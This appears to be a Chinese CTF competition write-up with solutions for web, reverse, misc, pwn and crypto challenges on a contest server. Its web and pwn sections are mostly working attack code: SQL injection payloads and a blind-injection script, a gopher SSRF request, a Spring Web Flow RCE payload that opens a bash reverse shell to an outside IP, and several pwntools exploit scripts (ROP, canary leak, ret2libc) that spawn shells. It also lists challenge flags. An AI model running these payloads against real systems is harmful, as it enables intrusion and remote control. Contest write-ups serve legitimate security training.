WEB
1.middle_magic
第一关用 %0a 绕过,末尾加 %23(即 URL 编码后的 #)
数组绕过第二关
json 弱类型比较
http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23
POST:
admin[]=1&root_pwd[]=2&level_3={"result":0}
flag{f03d41bf6c8d55f12324fd57f7a00427}
2.easy_sql_2
mysql8.0,table statement:
过滤了 information_schema.tables,改用 mysql.innodb_table_stats
admin'/**/and/**/(('ctf','%s',3,4,5,6)<=/**/(table/**/mysql.innodb_table_stats/**/limit/**/2,1))#
注出来flag表fl11aag
16进制注一下:
import string
import requests
import time
# One Session object reused for every request that follows.
req = requests.Session()
url = "http://182.116.62.85:26571/login.php"
def hh():
    """Probe the login endpoint one position at a time and print what it reveals.

    Uses the module-level ``req`` session and ``url``. For position ``i``
    (1-based) every code point ``j`` in 48..124 is substituted into
    ``payload``; the first response whose body contains "success" is taken
    as the answer for that position and the loop moves on. A position with
    no match is skipped silently.
    """
    payload = "admin'/**/and/**/(ascii(substr(hex((table/**/fl11aag/**/limit/**/1,1)),%s,1)))=%s#"
    # NOTE(review): `chars` is built but never used; the inner loop walks the
    # code points directly. The literal also contains the invalid escape `\{`.
    chars = string.printable.replace(".","").replace("?","").replace("`","").replace("+","") + "_\{}"
    result = ""
    for i in range(1,100):
        for j in range(48,125):
            data = {'username':payload%(i,j),'password':"admin"}
            # No timeout is set, so a stalled request blocks here indefinitely.
            rep = req.post(url,data)
            text = rep.text
            if "success" in text:
                print(j)
                result += chr(j)
                # print((chr(j)),end="")
                # payload = payload%(chr(j-1)+'%s')
                print(result)
                break
hh()  # runs immediately when the script is executed
3. easy_sql_1
admin') and updatexml(1,concat(0x7e,(select substr((select flag from flag),1,40))),1)#
Exp:
gopher://127.0.0.1:80/_POST%20/index.php%20HTTP/1.1%0D%0AHost%3A%20127.0.0.1%0D%0AContent-Type%3A%20application/x-www-form-urlencoded%0D%0ACookie%3A%20this_is_your_cookie%3DYWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHIoKHNlbGVjdCBmbGFnIGZyb20gZmxhZyksMSw0MCkpKSwxKSM%3D%0D%0AContent-Length%3A%2024%0D%0A%0D%0Auname%3Dadmin%26passwd%3Dadmin%0D%0A
4. spring
题目为CVE-2017-4971-Spring Web Flow远程代码执行漏洞
xman原题:
https://www.xctf.org.cn/library/details/8ad0f5b6ac740ec0930e948a40f34a67b3d4f565/
进入登录页面以后随便填一个给出的账号登录
然后进入http://ip/hotels/1页面点击Book Hotel
然后随便填写信息后点击Proceed按钮跳转到确认页面
点击Confirm抓包,输入payload后服务器开启监听
_eventId_confirm=&_csrf=bcc5ce94-5277-4064-b5f7-850432e3d2f0&_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/121.40.134.251/10086+0>%261")).start()=vulhub
然后发送数据包等待服务器连接
成功getshell,在根目录发现flag.txt文件,查看得到flag
flag:XMAN{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y}
5.easypy
<?php
include 'utils.php';

// Compare the submitted guess with $secret (both $secret and $flag come from utils.php).
if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    $message = ($guess === $secret)
        ? 'Congratulations! The flag is: ' . $flag
        : 'Wrong. Try Again';
}

// Both PHP_SELF and REQUEST_URI are taken from the request itself, so these
// two regex checks are the only gate in front of the source dump below.
if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}
if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])) {
    exit("hacker :)");
}

// With ?show_source present, highlight the basename of the requested script
// and stop; otherwise dump this file.
if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}
show_source(__FILE__);
?>
原题魔改,参考链接:https://www.gem-love.com/ctf/1898.html
直接打:http://182.116.62.85:21895/index.php/utils.php/%81?show[source
或者
/index.php/utils.php/%ff/?show[source
Reverse
1.DesignEachStep
2.AreYouRich
3.petition
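import os
#flag = "flag{96c69646-8184-4363-8de9-73f7398066c1}"

# One breakpoint address per flag position (43 entries, one per character
# of the commented-out flag above).
addr_l = [0x5655619c, 0x5655622a, 0x565562b8, 0x56556344, 0x565563d0, 0x5655645c,
          0x565564e8, 0x56556574, 0x56556602, 0x5655668e, 0x5655671c, 0x565567a6,
          0x56556834, 0x565568c2, 0x5655694e, 0x565569da, 0x56556a64, 0x56556aee,
          0x56556b7a, 0x56556c06, 0x56556c94, 0x56556d20, 0x56556daa, 0x56556e34,
          0x56556ec2, 0x56556f4e, 0x56556fda, 0x56557064, 0x565570f0, 0x5655717a,
          0x56557208, 0x56557292, 0x5655731e, 0x565573ac, 0x5655743a, 0x565574c4,
          0x56557552, 0x565575de, 0x5655766c, 0x565576fa, 0x56557784, 0x56557810,
          0x5655789c]

# Sentinel the gdb command list prints when the breakpoint at addr is reached.
_MARKER = "blogg9ggg"
flag = ""
for addr in addr_l:
    # gdb script: break at addr, print the marker, continue, then run the binary.
    # The `with` block closes the file; an explicit close() is not needed.
    with open('script', 'w') as f:
        f.write("""break *{0} if $pc == {1}
commands
silent
printf "{2}"
continue
end
run""".format(hex(addr), hex(addr), _MARKER))
    # Try every printable candidate byte for this position.
    for i in range(32, 128):
        tflag = flag + chr(i)
        with open('in', 'w') as f:
            f.write(tflag)
        # Fixed command string (no interpolated input), stdin from 'in',
        # stdout to 'log'.
        os.system("gdb ./Petition -batch -x script > log < in")
        with open("log") as f:
            ok = _MARKER in f.read()
        if ok:
            flag += chr(i)
            break
    print(flag)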
MISC
1.流量分析
# Dump every HTTP request's full URI from the capture, squeeze repeated
# newlines, and keep only the lines that mention "flag".
tshark -r timu.pcapng -T fields -e http.request.full_uri|tr -s '\n'|grep flag > log
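import re
with open('log') as f:
    tmp = f.read()
# Numbers appearing as "=<n>--" in the captured request URIs. \d+ (not \d*)
# so an empty match can never reach int() and raise ValueError.
data = [int(i) for i in re.findall(r'=(\d+)--', tmp)]
# Keep a value whenever the following request carries a smaller one; the
# writeup records the largest ASCII value of each step. Pairing with
# zip(data, data[1:]) stops at the last pair, so no IndexError to swallow.
flag = ''.join(chr(num) for num, nxt in zip(data, data[1:]) if num > nxt)
print(flag)
#flag{w1reshARK_ez_1sntit}
# 或者 下载附件以后得到一个数据包,用Wireshark分析流量发现sql注入数据,筛选出http数据仔细查看是布尔盲注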
记录下每次最大ASCII码数据包然后ASCII码转字符得到flag
2.a_misc
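# Recovered byte values (decimal ASCII code points).
result = [102, 108, 97, 103, 123, 99, 100, 50, 99, 51, 101, 50, 102, 101, 97, 52, 54, 51, 100, 101, 100, 57, 97, 102, 56, 48, 48, 100, 55, 49, 53, 53, 98, 101, 55, 97, 113, 125]
# Map each code point to its character in one pass instead of
# concatenating strings in a loop.
flag = "".join(map(chr, result))
print(flag)
#flag{cd2c3e2fea463ded9af800d7155be7aq}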
3.Misc2
下载附件只有一个check.pnd的图片,修改高度后依然没有结果,查看文件属性发现位深度是32位,想到LSB隐写,用Stegsolve查看alpha通道为0时图片是空白,所以判断alpha通道不存在数据
查看红蓝绿三个通道的最低位信息,发现是16进制编码
发现存在16进制
? flag{h0w_4bouT_enc0de_4nd_pnG}m?
这里直接转10进制再转下ascii即可
flag{h0w_4bouT_enc0de_4nd_pnG}
4.m1
flag{5cae25efeb73d7ba22f7728427376f59}
5. new_misc
PWN
1.echo
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./easyecho'
#context.arch='amd64'
# The loop only ends when io.interactive() returns or an exception escapes;
# the try/except that would restart it is commented out below.
while True :
    # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text='''
telescope $rebase(0x202040) 16
'''
    # No CLI argument: run the binary locally; otherwise connect to the remote instance.
    if len(sys.argv)==1 :
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=process(elfelf)
        # io=process(['./'],env={'LD_PRELOAD':'./'})
        clibc.srand(clibc.time(0))
        # NOTE(review): i386 libc path while clibc above is x86_64 - looks like
        # a leftover; `libc` is never referenced in this script anyway.
        libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=remote('182.116.62.85',24842)
        clibc.srand(clibc.time(0))
        # libc=ELF('./libc.so.6')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    # clibc.srand, gdb_text and one_gadgaet are set up but not used below.
    pay='a'*0x10
    io.recv()
    io.send(pay)
    io.recvuntil('a'*0x10)
    # Six bytes echoed after the padding, zero-extended to 8 for u64;
    # 0xcf0 is the same offset the easycho script below writes as 3312.
    elf_base=u64(io.recv(6)+'\x00\x00')-0xcf0+0x202040
    io.sendline('backdoor')
    io.recv()
    # gdb.attach(io,gdb_text)
    io.sendline('a'*0x168+p64(elf_base))
    io.recv()
    io.sendline('exitexit')
    # io.sendline(pay)
    # success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    # gdb.attach(io,gdb_text)
    io.interactive()
    # except Exception as e:
    # io.close()
    # continue
    # else:
    # continue
2.supermarket
原题 网上找的脚本
#coding:utf-8
from pwn import *
# context.log_level = 'debug'
# debug == 1 launches the binary locally; any other value connects to the remote instance.
debug = 0
if debug == 1:
    r = process('./task_supermarket')
    # gdb.attach(r)
else:
    r = remote('182.116.62.85',27518)
def add(name, price, descrip_size, description):
    """Menu option 1: create an item, answering each prompt with a newline-terminated line."""
    r.recvuntil('your choice>> ')
    r.send('1\n')
    r.recvuntil('name:')
    r.send(name + '\n')
    r.recvuntil('price:')
    r.send(str(price) + '\n')
    r.recvuntil('descrip_size:')
    r.send(str(descrip_size) + '\n')
    r.recvuntil('description:')
    r.send(str(description) + '\n')
def dele(name):
    """Menu option 2: delete the item called *name*."""
    r.recvuntil('your choice>> ')
    r.send('2\n')
    r.recvuntil('name:')
    r.send(name + '\n')
def lis():
    """Menu option 3: return the listing text between the header line and the next menu banner."""
    r.recvuntil('your choice>> ')
    r.send('3\n')
    r.recvuntil('all commodities info list below:\n')
    # recvuntil includes the delimiter in its return value; slice it off.
    return r.recvuntil('\n---------menu---------')[:-len('\n---------menu---------')]
def changePrice(name, price):
    """Menu option 4: adjust an item's price by *price*. Not called elsewhere in this script."""
    r.recvuntil('your choice>> ')
    r.send('4\n')
    r.recvuntil('name:')
    r.send(name + '\n')
    r.recvuntil('input the value you want to cut or rise in:')
    r.send(str(price) + '\n')
def changeDes(name, descrip_size, description):
    """Menu option 5: resize an item's description to *descrip_size* and rewrite it.

    Unlike add(), *description* is sent as-is (no str() conversion), so callers
    pass raw bytes built with p32().
    """
    r.recvuntil('your choice>> ')
    r.send('5\n')
    r.recvuntil('name:')
    r.send(name + '\n')
    r.recvuntil('descrip_size:')
    r.send(str(descrip_size) + '\n')
    r.recvuntil('description:')
    r.send(description + '\n')
def exit():
    """Menu option 6. Shadows the builtin exit(); not called in this script."""
    r.recvuntil('your choice>> ')
    r.send('6\n')
# Initial items: three entries, item 2's description resized to 0x100, then a fourth entry.
add('1', 10, 8, 'a')
add('2', 10, 0x98, 'a')
add('3', 10, 4, 'a')
changeDes('2', 0x100, 'a')
add('4', 10, 4, 'a')
def leak_one(address):
    """Rewrite item 2's description, then return the first byte printed after 'des.' in the listing.

    An empty field (listing ends in a bare newline) is reported as '\\x00'.
    """
    changeDes('2', 0x98, '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(address))
    res = lis().split('des.')[-1]
    if(res == '\n'):
        return '\x00'
    return res[0]
def leak(address):
    """Four consecutive leak_one() reads, logged as a little-endian u32 and returned as 4 bytes (DynELF callback)."""
    content = leak_one(address) + leak_one(address + 1) + leak_one(address + 2) + leak_one(address + 3)
    log.info('%#x => %#x'%(address, u32(content)))
    return content
# Resolve system through DynELF using the byte-at-a-time reader above.
d = DynELF(leak, elf = ELF('./task_supermarket'))
system_addr = d.lookup('system', 'libc')
log.info('system \'s address = %#x'%(system_addr))
bin_addr = 0x0804B0B8  # assigned but never referenced below
changeDes('1', 0x8, '/bin/sh\x00')
changeDes('2', 0x98, '4' + '\x00' * 0xf + p32(2) + p32(0x8) + p32(0x0804B018))
changeDes('4', 8, p32(system_addr))
dele('1')
r.sendline('cat flag')
r.interactive()
3.task_babyof
from pwn import *
from pwn import p64, u64, p32, u32, p8
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'sp', '-h']
elf = ELF('./babyof')
# libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
libc = ELF('./libc-2.27.so')
# io = process('./babyof')
io = remote('182.116.62.85','21613')
# Gadget addresses in the (non-PIE) binary; only prdi is used by exp().
prdi = 0x0000000000400743 # : pop rdi
prsi = 0x0000000000400741 # : pop rsi ; pop r15 ; ret
def exp():
    """Two round-trips with the remote: read a 6-byte value back, then send the second payload.

    Uses the module-level ``io``, ``elf``, ``libc`` and ``prdi``.
    """
    io.recvuntil('Do you know how to do buffer overflow?')
    payload = b'a'*0x48 + \
    p64(prdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x40066B)
    io.send(payload)
    # Take the last 6 bytes up to the first 0x7f and zero-extend to 8 bytes.
    leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
    info(hex(leak))
    libc_base = leak - libc.sym['puts']
    system = libc_base + libc.sym['system']
    info(hex(system))
    binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
    io.recvuntil('Do you know how to do buffer overflow?')
    payload = b'a'*0x48 + p64(prdi) + p64(binsh)+p64(0x0000000000130569+libc_base)+p64(0)*2+p64(system) # + p64(0x40066b)
    # gdb.attach(io)
    io.send(payload)
exp()
io.interactive()  # hand the connection over to the terminal
或者
# -*- coding: utf-8 -*-
from pwn import *
#p=process('./1')
p=remote('182.116.62.85',21613)
# NOTE(review): the binary is expected under the name '1' in the working
# directory here, while the first babyof script above loads './babyof'.
elf=ELF('1')
#p=process(['./1'],env={'LD_PRELOAD':'./libc-2.27_64.so'})
libc=ELF('libc-2.27.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#p=remote('node4.buuoj.cn',26442)
#libc=ELF('/ctf/work/buuoj/buu_libc/libc-2.27_64.so')
context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
context.log_level='debug'
def debug():
    """Attach gdb to the live process and pause. Not called anywhere in this script."""
    gdb.attach(p)
    pause()
def lg(name,val):
    """Log *val* as a labelled hexadecimal value through pwntools' success logger."""
    line = '{} : {}'.format(name, hex(val))
    log.success(line)
def add():
    """Send menu choice 1. Not called by the rest of this script."""
    p.recvuntil('Give me your choice : ')
    p.sendline('1')
ret=0x0000000000400506
pop_rdi=0x0000000000400743
p.recvuntil('Do you know how to do buffer overflow?')
# First payload: returns into 0x400632 after the puts call.
payload=0x40*'a'+p64(0)+p64(ret)+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])
payload+=p64(0x400632 )
p.send(payload)
# Last 6 bytes up to the first 0x7f, zero-extended; rebases libc on read.
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['read']
print hex(libc.address)
payload=0x40*'a'+p64(0)+p64(ret)+p64(pop_rdi)+p64(libc.search('/bin/sh').next())+p64(libc.sym['system'])
# NOTE(review): the second payload is sent twice, once before and once after
# the prompt is read; presumably only one of them is consumed - confirm.
p.send(payload)
p.recvuntil('Do you know how to do buffer overflow?')
p.send(payload)
p.interactive()
4.task_littleof
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='littleof'
#context.arch='amd64'
# The loop only ends when io.interactive() returns or an exception escapes;
# the try/except that would restart it is commented out below.
while True :
    # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text='''
telescope $rebase(0x202040) 16
'''
    # No CLI argument: run the binary locally; otherwise connect to the remote instance.
    if len(sys.argv)==1 :
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=process(elfelf)
        # io=process(['./'],env={'LD_PRELOAD':'./'})
        clibc.srand(clibc.time(0))
        libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=remote('182.116.62.85',27056)
        clibc.srand(clibc.time(0))
        # NOTE(review): local run uses libc 2.23, remote uses the 2.27 copy, so
        # symbol offsets differ between the two modes.
        libc=ELF('./libc-2.27.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    # gdb_text, one_gadgaet and (below) free_hook_addr are assigned but never used.
    pay='a'*0x49
    io.recv()
    io.send(pay)
    io.recvuntil('a'*0x49)
    # Seven bytes follow the echoed padding; a leading NUL is prepended.
    canary='\x00'+io.recv(7)
    pay='a'*0x48+canary+p64(0)+p64(0x400863)
    pay+=p64(elf.got['puts'])+p64(elf.plt['puts'])
    pay+=p64(0x400789)
    io.recv()
    io.send(pay)
    libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['puts']
    libc.address=libc_base
    bin_sh_addr=libc.search('/bin/sh\x00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    pay='a'*0x48+canary+p64(0)+p64(0x400863)
    pay+=p64(bin_sh_addr)
    pay+=p64(0x0000000000130569+libc_base)+p64(0)*2+p64(system_addr)
    pay+=p64(0x400600)
    io.recv()
    io.sendline('a')
    io.recvuntil('Try harder!')
    # gdb.attach(io,gdb_text)
    io.sendline(pay)
    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    # gdb.attach(io,gdb_text)
    io.interactive()
    # except Exception as e:
    # io.close()
    # continue
    # else:
    # continue
5.task_onecho
#coding:utf-8
import sys
from pwn import *
from ctypes import CDLL
context.log_level='debug'
elfelf='./onecho'
#context.arch='amd64'
# The loop only ends when io.interactive() returns or an exception escapes;
# the try/except that would restart it is commented out below.
while True :
    # try :
    elf=ELF(elfelf)
    context.arch=elf.arch
    gdb_text='''
telescope $rebase(0x202040) 16
'''
    # No CLI argument: run the binary locally; otherwise connect to the remote instance.
    if len(sys.argv)==1 :
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=process(elfelf)
        # io=process(['./'],env={'LD_PRELOAD':'./'})
        clibc.srand(clibc.time(0))
        libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    else :
        clibc=CDLL('/lib/x86_64-linux-gnu/libc-2.23.so')
        io=remote('182.116.62.85',24143)
        clibc.srand(clibc.time(0))
        libc=ELF('./libc.so.6')
        # ld = ELF('/lib/x86_64-linux-gnu/ld-2.23.so')
        one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]
    # 32-bit packing (p32/u32) from here on; gdb_text and one_gadgaet are unused.
    pay='../flag'+'\x00'*0x105+p32(0x11111111)+p32(0x08049812)+p32(0x0804c800)+p32(0x100)
    pay+=p32(0x08049812)+p32(0x0804c800)+p32(0x0804c800)
    pay+=p32(0x08049180)+p32(0x8049224)+p32(0x804BFC8)
    io.recv()
    # gdb.attach(io,gdb_text)
    io.sendline(pay)
    # Last 4 bytes up to the first 0xf7, interpreted as the puts address.
    libc_base=u32(io.recvuntil('\xf7')[-4:])-libc.sym['puts']
    libc.address=libc_base
    # bin_sh_addr, system_addr and free_hook_addr are computed but not used
    # by the second payload, which references open/write only.
    bin_sh_addr=libc.search('/bin/sh\x00').next()
    system_addr=libc.sym['system']
    free_hook_addr=libc.sym['__free_hook']
    pay='\x00'*0x10c+p32(0x11111111)+p32(0x08049812)+p32(0x0804c800)+p32(0x10)
    pay+=p32(libc.sym['open'])+p32(0x08049811)+p32(0x0804c801)+p32(0)+p32(0)
    pay+=p32(0x08049130)+p32(0x08049811)+p32(3)+p32(0x0804c900)+p32(0x30)
    pay+=p32(libc.sym['write'])+p32(0x08049811)+p32(1)+p32(0x0804c900)+p32(0x30)
    io.recv()
    # gdb.attach(io,gdb_text)
    io.sendline(pay)
    success('libc_base:'+hex(libc_base))
    # success('heap_base:'+hex(heap_base))
    # gdb.attach(io,gdb_text)
    io.interactive()
    # except Exception as e:
    # io.close()
    # continue
    # else:
    # continue
或者
# -*- coding: utf-8 -*-
from pwn import *
#p=process('./1')
# NOTE(review): port 27056 and the 'Try harder!' prompt below match the
# littleof entry above rather than onecho; this may be a misplaced script.
p=remote('182.116.62.85',27056)
elf=ELF('1')
libc=ELF('libc-2.27.so')
context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
context.log_level='debug'
def debug():
    """Attach gdb to the live process and pause. The only call site below is commented out."""
    gdb.attach(p)
    pause()
def lg(name,val):
    """Log *val* as a labelled hexadecimal value through pwntools' success logger."""
    line = '{} : {}'.format(name, hex(val))
    log.success(line)
pop_rdi=0x0000000000400863
pop_rsi_r15=0x0000000000400861  # defined but not used below
ret=0x000000000040059e
p.recvuntil('Do you know how to do buffer overflow?')
p.send(0x49*'a')
p.recvuntil(0x49*'a')
# 7 bytes with a NUL prepended, then 6 more bytes zero-extended to 8.
canary=u64('\x00'+p.recv(7))
bp=u64(p.recv(6).ljust(8,'\x00'))
print hex(bp)
print hex(canary)
payload=0x48*'a'+p64(canary)+p64(bp)+p64(ret)+p64(ret)+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])
payload+=p64(0x4006E2)
p.recvuntil('Try harder!')
p.send(payload)
libc.address=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['read']
payload=0x48*'a'+p64(canary)+p64(bp-8)+p64(ret)+p64(pop_rdi)+p64(libc.search('/bin/sh').next())+p64(libc.sym['system'])
#debug()
# NOTE(review): the second payload is sent twice (before and after the
# prompt), as in the babyof script above; presumably only one is consumed.
p.send(payload)
p.recvuntil('Try harder!')
p.send(payload)
p.interactive()
6.easycho
解题思路
通过恶意更改canary触发smash打印出flag
# -*- coding: utf-8 -*-
from pwn import *
#p=process('./1')
# Same port as the echo script above (24842).
p=remote('182.116.62.85',24842)
context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
#context.log_level='debug'
def debug():
    """Attach gdb to the live process and pause. The only call site below is commented out."""
    gdb.attach(p)
    pause()
def lg(name,val):
    """Log *val* as a labelled hexadecimal value through pwntools' success logger."""
    line = '{} : {}'.format(name, hex(val))
    log.success(line)
p.recvuntil('Name: ')
p.sendline(16*'a')
p.recvuntil(16*'a')
# Six bytes echoed after the name, zero-extended; 3312 == 0xcf0, the same
# offset the echo script above uses.
base=u64(p.recv(6).ljust(8,'\x00'))-3312
lg('base',base)
p.recvuntil('Input: ')
p.sendline(0x100*'b'+0x50*'a'+p64(0x111)+p64(0x1111)+p64(base+0x202040)+p64(base+0x202040))
p.recvuntil('Input: ')
p.sendline('backdoor')
#debug()
p.recvuntil('Input: ')
p.sendline('exitexit')
p.interactive()
Crypto
原题:
http://www.3fwork.com/kaifa200/004475MYM012472/
1.a_crypto
ROT13编码,解码后得到:
4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35
16进制串转字符串得
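a = "4B595954494D32515046324757595A534E52415653334357474E4A575955544E4B5A4D46434F4B59474253464D5A444E4D51334557524B5A4F424944473542554B595A44534B324E49565746515532464B49345649564B464E4E494543504A35"
# Decode the hex pairs with bytes.fromhex instead of eval('0x..') on data:
# eval would execute arbitrary Python if the string ever came from an
# untrusted source. latin-1 maps each byte n to chr(n), so the output is
# identical to the original per-byte chr() loop, including any byte >= 0x80.
decoded = bytes.fromhex(a).decode("latin-1")
print(decoded, end="")
#KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5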
得到:
KYYTIM2QPF2GWYZSNRAVS3CWGNJWYUTNKZMFCOKYGBSFMZDNMQ3EWRKZOBIDG5BUKYZDSK2NIVWFQU2FKI4VIVKFNNIECPJ5
base32串解码得
V143Pytkc2lAYlV3SlRmVXQ9X0dVdmd6KEYpP3t4V29+MElXSER9TUEkPA==
base64解码得
W^7?+dsi@bUwJTfUt=_GUvgz(F)?{xWo~0IWHD}MA$<
base85解码得
flag{W0w_y0u_c4n_rea11y_enc0d1ng!}
或者
利用ciphey工具
2.easy_crypto
公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐
下载完打开一看,这不是核心价值观编码,直接解一下
社会主义核心价值观加密,在线解http://www.atoolbox.net/Tool.php?Id=850
3. babyrsa
原题
http://www.zbc53.top/archives/148/
题目:
4.Crazy_Rsa_Tech
附上题目源码文件:
https://pan.baidu.com/s/1HG5Q1cxFWWi4-gaoOPKGFw 提取码: 2ac6
https://mp.weixin.qq.com/s/WGEjSSNDJuZcnqJJev5zGQ
https://mp.weixin.qq.com/s/TZt0oUkmgJYe21SbcS5Ybw
https://blog.csdn.net/qq_51724251/article/details/120658086